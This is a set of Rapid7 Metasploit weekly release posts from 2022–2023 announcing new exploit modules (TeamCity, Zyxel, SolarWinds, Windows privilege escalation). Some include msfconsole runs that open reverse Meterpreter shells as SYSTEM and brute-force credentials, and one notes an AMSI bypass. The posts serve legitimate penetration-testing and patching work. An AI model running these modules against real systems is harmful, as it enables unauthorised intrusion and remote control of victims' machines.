• #18737 from zeroSteiner – This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.

Bugs fixed (3)

• #18662 from dwelch-r7 – Fixes an edgecase where features set dns_feature true did not correctly parse a user’s /etc/resolv.conf file if there were multiple nameservers present.
• #18712 from ekalinichev-r7 – Fixes a crash with Metasploit’s REST api when calling /api/v1/modules?name=aux.
• #18746 from zeroSteiner – Fixes a module bug when using the generate OPTION=VALUE syntax. Previously, the module’s datastore would be unintentionally updated with the new option value.

Documentation added (1)

• #18729 from poupapaa – This fixes a typo in Metasploit-Guide-SMB.md.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.52…6.3.53
• Full diff 6.3.52…6.3.53

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/09/29/metasploit-weekly-wrap-up-29/

TeamCity authentication bypass and remote code execution

This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.

This exploit works against both Windows and Linux targets. Example usage:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting the authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >

New module content (2)

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for JetBrain’s TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

Microsoft Error Reporting Local Privilege Elevation Vulnerability

Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10×64 22H2.

Enhancements and features (1)

• #18399 from h00die – Fixes multiple spelling mistakes in module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.35…6.3.36
• Full diff 6.3.35…6.3.36

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/06/16/metasploit-weekly-wrap-up-15/

Metasploit T-Shirt Design Contest

In honor of Metasploit’s 20th anniversary, Rapid7 is launching special edition t-shirts – and we’re inviting members of our community to have a hand in its creation. The contest winner will have their design featured on the shirts, which will then be available to pick up at Black Hat 2023.

We will be accepting submissions from now through June 30! Contest details, design guidelines, and submission instructions here

New module content (12)

RPyC 4.1.0 through 4.1.1 Remote Command Execution

Authors: Aaron Meese and Jamie Hill-Daniel
Type: Auxiliary
Pull request: #17670 contributed by ajmeese7
AttackerKB reference: CVE-2019-16328

Description: Adds a new rpyc_rce module to exploit CVE-2019-16328 and achieve remote command execution as the vulnerable server’s service user.

Apache RocketMQ Version Scanner

Authors: Malayke and h00die
Type: Auxiliary
Pull request: #18075 contributed by h00die

Description: This PR adds a version scanner for Apache RocketMQ.

Symmetricom SyncServer Unauthenticated Remote Command Execution

Authors: Justin Fatuch Apt4hax, Robert Bronstein, and Steve Campbell
Type: Exploit
Pull request: #18077 contributed by sdcampbell
AttackerKB reference: CVE-2022-40022

Description: This adds an exploit for Symmetricom SyncServer appliances (S100-S300 series) vulnerable to an unauthenticated command injection in the hostname parameter in a request to the /controller/ping.php endpoint. The command injection vulnerability is patched in the S650 v2.2. Requesting the endpoint will result in a redirect to the login page; however, the command will still be executed, resulting in RCE as the root user.

TerraMaster TOS 4.2.06 or lower – Unauthenticated Remote Code Execution

Authors: IHTeam and h00die-gr3y
Type: Exploit
Pull request: #18063 contributed by h00die-gr3y
AttackerKB reference: CVE-2020-28188

Description: This adds an exploit for TerraMaster NAS devices running TOS 4.2.06 or prior. The logic in include/makecvs.php permits shell metacharacters through the Event parameter in a GET request, permitting the upload of a webshell without authentication. Through this, an attacker can achieve remote code execution as the user running the TOS web interface.

TerraMaster TOS 4.2.15 or lower – RCE chain from unauthenticated to root via session crafting.

Authors: h00die-gr3y and n0tme
Type: Exploit
Pull request: #18070 contributed by h00die-gr3y
AttackerKB reference: CVE-2021-45841

Description: This exploits a series of vulnerabilities including session crafting and command injection in TerraMaster NAS versions 4.2.15 and below to achieve unauthenticated RCE as the root user.

TerraMaster TOS 4.2.29 or lower – Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989

Authors: 0xf4n9x, Octagon Networks, and h00die-gr3y
Type: Exploit
Pull request: #18086 contributed by h00die-gr3y
AttackerKB reference: CVE-2022-24989

Description: This exploits an administrative password leak and command injection vulnerability on TerraMaster devices running TerraMaster Operating System (TOS) versions 4.2.29 and below to achieve unauthenticated RCE as the root user.

Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution

Author: sf
Type: Exploit
Pull request: #18016 contributed by sfewer-r7
AttackerKB reference: CVE-2023-28771

Description: This adds an exploit for CVE-2023-28771 which is a remote, unauthenticated OS command injection in IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the root user.

Oracle Weblogic PreAuth Remote Command Execution via ForeignOpaqueReference IIOP Deserialization

Authors: 14m3ta7k, 4ra1n, and Grant Willcox
Type: Exploit
Pull request: #17946 contributed by gwillcox-r7
AttackerKB reference: CVE-2023-21839

Description: This adds an exploit for CVE-2023-21839 which is an unauthenticated RCE in Oracle Weblogic. Successful exploitation results in remote code execution as the oracle user.

Three x86 Linux Fetch Payloads

Author: Spencer McIntyre
Type: Payload
Pull request: #18084

Description: Fetch and execute a x86 payload from an HTTP server. These modules were developed live on stream. Fetch based payloads offer a shorter path from command injection to a Metasploit session

Authors: Daniel López Jiménez (attl4s) and Simone Salucci (saim1z)
Type: Post
Pull request: #18022 contributed by attl4s

Description: This adds the post/windows/manage/make_token module which is capable of creating new tokens from known credentials and then setting them in a running instance of Meterpreter, which can allow that session to access resources it might not have previously been able to access.

Enhancements and features (11)

• #17336 from smashery – This PR adds new code to simplify and standardize windows version checking and comparisons.
• #17781 from araout42 – Adds support for module writers to supply a custom include_dirs array when using the MinGW library to compile payloads.
• #17942 from cdelafuente-r7 – The script generated by the web_delivery module is blocked by the Antimalware Scan Interface (AMSI) on newer versions of windows. This PR includes an enhancement which allows the web_delivery module to bypass AMSI.
• #17955 from jvoisin – Reduces the size of PHP payloads such as php/reverse_php.
• #18050 from adfoster-r7 – Adds a new post/test/all module which will run all available post/test modules against the open session.
• #18069 from sempervictus – This updates the LDAP server library to handle unbind requests.
• #18089 from shellchocolat – Adds supports for masm output format when generating payloads.
• #18106 from adfoster-r7 – This PR updates Meterpreter’s setg SessionTLVLogging true support to no longer truncate useful values such as payload UUIDs, file paths, executed commands etc.
• #18109 from adfoster-r7 – Update test post modules to always have a clean, writable, and consistent test file system directory when running modules under the loadpath test/modules directory.
• #18110 from adfoster-r7 – When running test modules that have been loaded by loadpath test/modules, any verbose printing logic generated will now be prefixed by the current test that is being run.
• #18115 from adfoster-r7 – This PR updates unknown windows errors on python Meterpreter to include original error code.

Bugs fixed (15)

• #18051 from adfoster-r7 – Adds additional skip calls to the test/post modules to ensure that only relevant test expectations are run against the specified session without crashes.
• #18054 from bwatters-r7 – This PR fixes the issue where an ArgumentError was thrown on the FETCH_SRVHOST option when running the info command when using a fetch payload.
• #18068 from smashery – Fixes a bug that caused multi/manage/shell_to_meterpreter to not break when win_transfer=VBS was set.
• #18076 from smashery – This fixes a bug in the Windows Meterpreter’s memory free API.
• #18083 from zeroSteiner – A bug has been fixed in the stdapi extension of Meterpreter when calling the stdapi_sys_process_memory_free command. This incorrectly handled memory, leading to a double free condition, which would crash Meterpreter. This has since been fixed.
• #18090 from adfoster-r7 – The auxiliary/admin/kerberos/keytab EXPORT action will now consistently order exported entries.
• #18097 from adfoster-r7 – This PR fixes Python Meterpreter sessions from crashing when extracting macOS network configuration when using the route or ipconfig commands.
• #18098 from adfoster-r7 – This PR Fixes rex-text crashes when running ruby 3.3.
• #18099 from adfoster-r7 – This PR fixes Python Meterpreter subprocess deadlock and file descriptor leak caused by the stdout/stderr file descriptors not being closed.
• #18101 from adfoster-r7 – This PR fixes a Python Meterpreter macOS route command crash when ifconfig has a gateway name as a mac address separated by dots.
• #18102 from adfoster-r7 – This PR adds a fix for false negatives on files not existing on windows python Meterpreter.
• #18105 from adfoster-r7 – This PR fixes a bug when running the time command in msfconsole with complex commands.
• #18108 from adfoster-r7 – Updates the test/services module to more consistently pass. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
• #18111 from adfoster-r7 – This PR fixes an initialized constant error when Meterpreter registry key reads timeout.
• #18112 from adfoster-r7 – This PR fixes a symlink test bug when running python Meterpreter on windows.

Documentation added (1)

• #18058 from gwillcox-r7 – Adds additional details on how to navigate the Metasploit codebase.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.20…6.3.21
• Full diff 6.3.20…6.3.21

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/05/12/metasploit-weekly-wrap-up-10/

Chaining for the win #1: Pentaho Business Server

This week, our very own jheysel-r7 added an exploit module that leverages two vulnerabilities in Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x. The module chains an authentication bypass (CVE-2022-43939) and Server Side Template Injection – SSTI – (CVE-2022-43769) to achieve unauthenticated code execution as the user running the application. Patches are available and It is highly recommended to apply them as soon as possible. The exploit is straightforward to execute and very reliable.

Chaining for the win #2: Zyxel

Community contributor h00die-gr3y added another exploit module that also chains two vulnerabilities, this time targeting Zyxel devices. It exploits an unauthenticated local file disclosure – LFI – (CVE-2023-28770) vulnerability and a weak password derivation algorithm to obtain unauthenticated remote code execution as the supervisor user. These vulnerabilities affect the zhttpd and zcmd binaries, respectively, which are present on more than 40 Zyxel routers and CPE devices. The module leverages a LFI to read the entire configuration of the router, from which it derives the supervisor password by exploiting a weak password derivation algorithm. Finally, if the device is reachable via SSH, the module establishes a connection using the leaked supervisor credentials to execute commands.

GSoC Project: Enable HTTP-Trace for scanner modules

One more successful GSoC project to enhance Metasploit has landed this week. Contributor 3V3RYONE, extended the HTTP-Trace capability to login scanner modules, which was only available to exploit modules before. That’s a very useful feature to debug a module by allowing users to display the full HTTP requests and responses of scanner modules within msfconsole. More information about previous Metasploit GSoC projects can be found here.

Here is an example output of a login scanner module running with the HTTPTrace feature enabled:

msf6 > use auxiliary/scanner/http/buffalo_login 
msf6 auxiliary(scanner/http/buffalo_login) > set RHOSTS www.example.com
RHOSTS => www.example.com
msf6 auxiliary(scanner/http/buffalo_login) > set USERPASS_FILE data/wordlists/http_default_userpass.txt
USERPASS_FILE => data/wordlists/http_default_userpass.txt
msf6 auxiliary(scanner/http/buffalo_login) > set HttpTrace true
HttpTrace => true
msf6 auxiliary(scanner/http/buffalo_login) > run

####################
# Request:
####################
POST /dynamic.pl HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

bufaction=verifyLogin&user=connect&password=connect
####################
# Response:
####################
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Mon, 26 Sep 2022 06:21:16 GMT
Connection: close

[...]

New module content (3)

Zyxel chained RCE using LFI and weak password derivation algorithm

Authors: Bogi Napoleon Wennerstrøm, SEC Consult Vulnerability Lab, Thomas Rinsma, and h00die-gr3y
Type: Exploit
Pull request: #17881 contributed by h00die-gr3y
AttackerKB reference: CVE-2023-28770

Description: This adds a new exploit module that leverages multiple vulnerabilities in the zhttpd and zcmd binaries, which are present on more than 40 Zyxel routers and CPE devices, to achieve remote code execution as user supervisor. This chains a local file disclosure vulnerability that allows an unauthenticated attacker to read the configuration file and a weak password derivation algorithm vulnerability. The module uses the leaked credentials to establish a SSH connection and execute commands.

Pentaho Business Server Auth Bypass and Server Side Template Injection RCE

Authors: Harry Withington, dwbzn, and jheysel-r7
Type: Exploit
Pull request: #17964 contributed by jheysel-r7
AttackerKB reference: CVE-2022-43939

Description: A new module has been added which exploits Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x. To do this it first exploits CVE-2022-43939 to bypass authentication before using CVE-2022-43769, a Server Side Template Injection (SSTI) vulnerability, to achieve unauthenticated code execution as the user running the Pentaho Business Analytics Server.

ManageEngine ADAudit Plus Authenticated File Write RCE

Authors: Erik Wynter and Moon
Type: Exploit
Pull request: #17133 contributed by ErikWynter
AttackerKB reference: CVE-2021-42847

Description: A new exploit module has been added which gains authenticated RCE on ManageEngine AdAudit builds 7005 and prior by creating a custom alert profile and leveraging the custom alert script component. On builds 7004 and later, CVE-2021-42847 is utilized to gain RCE as the user running AdAudit, which will typically be a local administrator, via an arbitrary file write to create the necessary script for the alert profile.

Enhancements and features (3)

• #17060 from 3V3RYONE – Updates the HTTP scanner modules with the functionality to log both HTTP requests and responses. This functionality can be enabled with set HTTPTrace true. This functionality is useful for debugging modules. In scenarios where the traffic is encrypted, for instance with WinRM, the logged values will be unencrypted.
• #17807 from gwillcox-r7 – Adds documentation for Metasploit’s folder structure, so that those unfamiliar with Metasploit can quickly get up to speed and understand where files might be located or where to place new files when developing content for Metasploit.
• #17972 from h00die – Updates the example modules to align with the latest Metasploit framework module conventions.

Bugs fixed (2)

• #17968 from zeroSteiner – A bug has been fixed where Certificate Templates were not being identified as vulnerable when there was an ACE that granted enrollment rights but did not correspond to any object types. The logic has now been updated so that only ACEs associated with an object that is neither the CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT right nor the CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT right will be ignored.
• #17980 from sempervictus – This fixes the file system path check used by PowerShell sessions.

Documentation added (1)

• #17984 from adfoster-r7 – Fixes a Kerberos datastore name typo in the WinRM wiki docs.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.15…6.3.16
• Full diff 6.3.15…6.3.16

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/03/31/metasploit-weekly-wrap-up-198/

Windows 11 ADF WinSock Priv Esc

The new windows/local/cve_2023_21768_afd_lpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write primitive on Windows 11. This exploit is a write-where bug that allows arbitrary write of one byte in kernel memory. This is enough to modify the I/O ring internal structures and get remote code execution as the NT AUTHORITY\SYSTEM user. The Metasploit module is based on the exploit PoC authored by chompie1337 and b33f .

Example running with Windows 11 Version 22H2 Build 22621.963 x64:

msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true
[*] Started reverse TCP handler on 192.168.100.9:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Windows Build Number = 22621.963
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 3748 launched.
[*] Reflectively injecting the DLL into 3748...
[*] Sending stage (200774 bytes) to 192.168.100.9
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 11 opened (192.168.100.9:4444 -> 192.168.100.9:55346) at 2023-03-27 18:46:08 +0200
meterpreter >

SolarWinds RCE and AMQP Support

Metasploit 6.3.10 now has support for the Advanced Message Queuing Protocol (AMQP). This protocol is used in services such as RabbitMQ. Three new modules have been added that leverage this functionality thanks to the work of our very own Spencer McIntyre:

The exploits/windows/misc/solarwinds_amqp_deserialization module adds an exploit for CVE-2022-38108 which is an authenticated .NET deserialization vulnerability within the SolarWinds platform’s SWIS (SolarWinds Information Service) component. To trigger the vulnerability, an attacker must authenticate to the RabbitMQ (message queue) server (via the AMQP protocol) and publish a specially crafted object. Once SWIS receives the message, it will deserialize it, allowing for OS command execution as NT AUTHORITY\SYSTEM. Example targeting SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64:

msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run
[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400
meterpreter >

The auxiliary/scanner/amqp/amqp_version module displays the version information about Advanced Message Queuing Protocol (AMQP) 0-9-1 servers:

msf6 > use auxiliary/scanner/amqp/amqp_version
msf6 auxiliary(scanner/amqp/amqp_version) > set RHOSTS 192.168.159.0/24
RHOSTS => 192.168.159.0/24
msf6 auxiliary(scanner/amqp/amqp_version) > run
[*] 192.168.159.17:5671 - AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PLAIN)
[*] 192.168.159.0/24:5671 - Scanned  51 of 256 hosts (19% complete)
[*] 192.168.159.0/24:5671 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.159.0/24:5671 - Scanned  98 of 256 hosts (38% complete)
[*] 192.168.159.128:5671 - AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
[*] 192.168.159.0/24:5671 - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.159.0/24:5671 - Scanned 150 of 256 hosts (58% complete)
[*] 192.168.159.0/24:5671 - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.159.0/24:5671 - Scanned 199 of 256 hosts (77% complete)
[*] 192.168.159.0/24:5671 - Scanned 216 of 256 hosts (84% complete)
[*] 192.168.159.0/24:5671 - Scanned 233 of 256 hosts (91% complete)
[*] 192.168.159.0/24:5671 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_version) > services 
Services
========
host             port  proto  name   state  info
----             ----  -----  ----   -----  ----
192.168.159.17   5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PL
                                            AIN)
192.168.159.128  5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
msf6 auxiliary(scanner/amqp/amqp_version) 

The new auxiliary/scanner/amqp/amqp_login module can be used to bruteforce service credentials:

msf6 > use auxiliary/scanner/amqp/amqp_login 
msf6 auxiliary(scanner/amqp/amqp_login) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/amqp/amqp_login) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(scanner/amqp/amqp_login) > set PASS_FILE data/wordlists/unix_passwords.txt
PASS_FILE => data/wordlists/unix_passwords.txt
msf6 auxiliary(scanner/amqp/amqp_login) > set RPORT 5672
RPORT => 5672
msf6 auxiliary(scanner/amqp/amqp_login) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 auxiliary(scanner/amqp/amqp_login) > run
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:admin (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:12345 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456789 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[+] 192.168.159.128:5672 - Login Successful: admin:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_login) > 

New module content (5)

AMQP 0-9-1 Login Check Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17828 contributed by zeroSteiner

Description: This adds a login scanner module for AMQP services

AMQP 0-9-1 Version Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17827 contributed by zeroSteiner

Description: This adds a scanner module that extracts version information from AMQP protocol servers.

Optergy Proton and Enterprise BMS Command Injection using a backdoor

Authors: Gjoko Krstic and h00die-gr3y
Type: Exploit
Pull request: #17806 contributed by h00die-gr3y
AttackerKB reference: CVE-2019-7276

Description: This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications.

Ancillary Function Driver (AFD) for WinSock Elevation of Privilege

Authors: Christophe De La Fuente, Yarden Shafir, b33f, and chompie
Type: Exploit
Pull request: #17826 contributed by cdelafuente-r7
AttackerKB reference: CVE-2023-21768

Description: This PR adds an exploit module for CVE-2023-21768 that achieves local privilege escalation on Windows 11 2H22.

SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE

Authors: Justin Hong, Lucas Miller, Piotr Bazydło, and Spencer McIntyre
Type: Exploit
Pull request: #17785 contributed by zeroSteiner
AttackerKB reference: CVE-2022-38108

Description: This adds an exploit for an authenticated .NET deserialization vulnerability that affects the SolarWinds Information Service (SWIS) component within SolarWinds. The SWIS component will deserialize messages received by the AMQP message queue, resulting in command execution as NT AUTHORITY\SYSTEM.

Enhancements and features (6)

• #17724 from dwelch-r7 – Updates the modules/auxiliary/admin/kerberos/forge_ticket.rb module with a new IncludeTicketChecksum option. When set to true the forged PAC will include the PAC_TICKET_CHECKSUM required in newer Windows AD implementations
• #17753 from adfoster-r7 – Updates the auxiliary/admin/kerberos/get_ticket module to support using forged golden tickets. Users can now provide the Krb5Ccname option to supply the Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked for a valid TGT as normal
• #17789 from bcoles – This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
• #17789 from bcoles – This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
• #17813 from samueloph – This sets the CHECK_FALSE option to true by default so that the scanner will bail upon detecting false positive results.
• #17833 from adfoster-r7 – Updates the Metasploit RPC module.info command response to include whether or not the module supports a check method

Bugs fixed (6)

• #17704 from ide0x90 – Fixes a crash in multi/http/solr_velocity_rce that was discovered when targeting a machine running Apache Solr 8.3.0 on Linux that required authentication.
• #17808 from adfoster-r7 – Updates multiple broken Secunia references in modules with equivalent links found within Wayback Machine – a digital archive of the world wide web founded by the Internet Archive.
• #17818 from adfoster-r7 – This PR fixes a crash in the RPC job info command.
• #17825 from dm-ct – Fixes broken documentation references in the exploits/linux/local/zimbra_slapper_priv_esc module
• #17830 from bcoles – Fixes a crash when parsing dates in ./tools/modules/committer_count.rb
• #17831 from dm-ct – Fixes broken documentation references in the exploits/aix/rpc_cmsd_opcode21.rb module

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.9…6.3.10
• Full diff 6.3.9…6.3.10

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/11/11/metasploit-weekly-wrap-up-183/

ADCS – ESC Vulnerable certificate template finder

Our very own Grant Willcox has developed a new module which allows users to query a LDAP server for vulnerable Active Directory Certificate Services (AD CS) certificate templates. The module will print the detected certificate details, and the attack it is susceptible to. This module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates.

Example module output showing an identified vulnerable certificate template:

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
[*] Running module against 172.26.104.157
[*] Discovering base DN automatically
[+] 172.26.104.157:389 Discovered base DN: DC=daforest,DC=com
[*] Template: SubCA
[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
[*]    Certificate Template Enrollment SIDs:
[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
[*]    Issuing CAs:
